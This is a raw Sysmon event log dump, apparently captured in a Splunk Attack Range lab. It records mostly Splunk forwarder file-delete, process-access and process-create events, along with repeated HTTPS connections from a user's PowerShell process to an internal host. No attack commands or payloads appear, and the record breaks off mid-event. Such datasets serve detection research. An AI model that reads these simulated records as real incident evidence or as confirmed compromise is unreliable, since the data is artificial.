23542300x800000000000000035126556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:51.656{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6321C77A3DA67BDD66FD3E9812FF8D3F,SHA256=6CCA6072D7C1F6A8E9066D235B2D7DB18DA5939B8104FF7E3CD889926F105757,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:51.323{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D4870E7F29205A92649D63BCAD08C767,SHA256=B5057ED7345061913A7A7DA39368B4956D43B31036818E8D5ED1E145FAAE7417,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:52.686{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FA47E1CA33091A7FF29CB4894F316C1,SHA256=B6681F4BB3EB6DD5BD52D605C4B201066B8984C039BFBE38569B09532026C6E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:16.295{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61907-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:53.700{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28CB9B7CBA2C4D2D73B241EEB7F3B5B2,SHA256=3991F5F05302C78F9AA58C8E69A4DC1743245E5609E7097EA7782F23B9969ED6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:54.717{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F66AC83C736D76FB24E7375895A1603,SHA256=0C59424712C18425757029390B297E85016DB979ADE52EF688314F17BFF9E345,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:18.396{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61908-false10.0.1.12-8000- 23542300x800000000000000035126563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:55.767{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D29124D71C377AC5D712F9E1B2F186B,SHA256=782CE046118B64675CD723B1527776982EAFDC3BE9B7BD1EC9942A347833C047,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035126562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:48:55.236{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a5c4-0x7c8b947f) 23542300x800000000000000035126566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:56.781{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE3F826C8066BE5C922117E1BF59EE31,SHA256=7520EED70683F9A537371149C509DB5A139D4F018BEA41399ACB6A7C3712DF88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:21.311{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61909-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:56.182{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=FD025BB22A822FF00DE8582943B9D862,SHA256=6BE162290C8497781CBE247FA20AB53D229A38EB483FBA0D09F654AEDCF43942,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:57.814{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B56CA506DABEC2B5A15A721D0636CF6,SHA256=7BACAC2D6F533172D9CF730A62A6EF49C79EB92E0483F55D5D8336447BEA12C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:21.357{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse168.61.215.74-123ntp 23542300x800000000000000035126570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:58.832{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F32F354B4527C43B6498530DC0914148,SHA256=1C693F1D48B39A210232CD8CCF4FC55B0D7CFEF34E3C79EE1FA385EEFFA1E96F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:23.408{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61910-false10.0.1.12-8000- 23542300x800000000000000035126572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:59.878{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:48:59.847{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3924D0CEAD78C8AFF1761523911D7209,SHA256=F3624496E6D7D718EEA4FC8D53693B704568D14967F7A6ED18F6E00C99AC90A2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:00.862{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00AB9C66EAA1CD11AE7285AB05360731,SHA256=5C65CFE63C35268C1B4C1978164FF1EE48257FBAB31888BC9D1F17D65C4F06CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:26.037{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61911-false10.0.1.12-8089- 23542300x800000000000000035126574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:01.881{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33F133CD62048526E5CDA850CBBE2E35,SHA256=7D2C57E76B8BE8A890569724AF342202E0E455C7882C9C8C6DE2CE8D2C78F677,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:27.321{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61912-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:02.915{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAA219144E793D9B15FA283B6EC6E326,SHA256=C56E5025D16B14E1F1219FAEED9F9F7F28CCD1420E8F0422AEFEF7DB0FA4F58D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:02.150{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=46D7A92C0068C9A9C295F1A7402B8181,SHA256=A9E3C11780E08A3CE562EF1BA814E00D24E48631390A791485A23A129AFD8548,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:03.933{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3159F49801D012BF2B935FEF1A465C4D,SHA256=9BFCF73DC10558AF7C25F7CB6A282798DA664A978A62F9B4C0CBD14D9F05708E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:04.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55F862C8497ABBDA6B0A2513E81B50FA,SHA256=5EF1845012BB84ABD3938FB2A1BFA5096314437DC7E281C4A6A171863E82600D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:05.977{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00028EA731DA60D9CCA69E12FE45F3D0,SHA256=FF2E1CF009B06165F92611CAB3AB6F0EF801E13AD5264E08BA3B2FE5B70CC6E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:29.224{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61913-false10.0.1.12-8000- 23542300x800000000000000035126583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:07.009{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34DC850F03C18709434575971AE1C418,SHA256=4508FB3C0774C640F1B95E0A9D2C398E2EC073A18200ECAEC7C246FFCF4963EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:08.209{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B907CF8D43FE81198459BFB2A223DEC0,SHA256=8039543D6F0632A4A360070216A1C920D9588C2FC5A69E5823C65DB85BBDF7EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:08.044{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CA86B39C216EBEB14D8A868CF00C4D4,SHA256=6F72118251015D92EBAA2B7EF0DF721AA81751BC23F58D812E95CFDABD517DCB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126587Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:33.336{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61914-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:09.074{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59B79FE659B421B27FAE3D4438DE2DD0,SHA256=D8D51687EBDE0888DD46079E2A0310C0730D9FF7C109AB647EC31FFE8A07CFCE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126598Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:10.526{B81B27B7-8156-613A-8C96-03000000C801}6848344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126597Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:10.341{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8156-613A-8C96-03000000C801}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126596Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:10.341{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126595Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:10.341{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126594Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:10.341{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126593Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:10.341{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8156-613A-8C96-03000000C801}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035126592Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:10.341{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126591Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:10.341{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8156-613A-8C96-03000000C801}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035126590Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:10.327{B81B27B7-8156-613A-8C96-03000000C801}6848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035126589Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:34.365{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61915-false10.0.1.12-8000- 23542300x800000000000000035126588Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:10.089{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B273001B9A378A9104E9F782FF2522CE,SHA256=F0CFF7273420CCEA17776E0CD61F79B827716567ED81F099C79B99EBB4E85DB4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126609Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.346{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=222E9909C1E2B54C922D7BE431BB1608,SHA256=3430C9405BBA9261B1CB4C423AF2458E0FF19BF40E08864ADCA784A7FDBED15E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126608Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.346{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E33906FCFCC4FCC6805E80D9D6D90A30,SHA256=D272A98EF96030B94A0A32C536EFADB7987920736A3A2AA359A25DD4F1BB46D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126607Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:49:11.115{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 